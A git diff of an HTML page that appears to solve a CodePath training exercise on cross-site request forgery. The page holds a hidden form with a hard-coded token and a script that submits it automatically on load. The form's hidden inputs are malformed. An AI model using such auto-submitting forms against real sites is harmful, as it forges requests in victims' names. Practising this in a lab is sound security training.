--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
-<form name="csrfForm" action="https://flags.codepath.com/root/grantComplete/http/public/protected/flags/csrf_09/" method="POST">
-   <input type="hidden" firstname="tahlla" />
-   <input type="hidden" lastname="tahlla"/>
-   <input type="hidden" csfrtoken="95f9f7a45623b00e98f333b9d1039fea"  />
+<form name="csrfForm" action="https://flags.codepath.com/http/public/protected/flags/csrf_09/" method="POST">
+   <input type="hidden" firstname="" />
+   <input type="hidden" lastname="" />
+   <input type="hidden" csfrtoken="95f9f7a45623b00e98f333b9d1039fea" />
    <input type="submit" />
 </form>
 <script> document.csrfForm.submit(); </script>
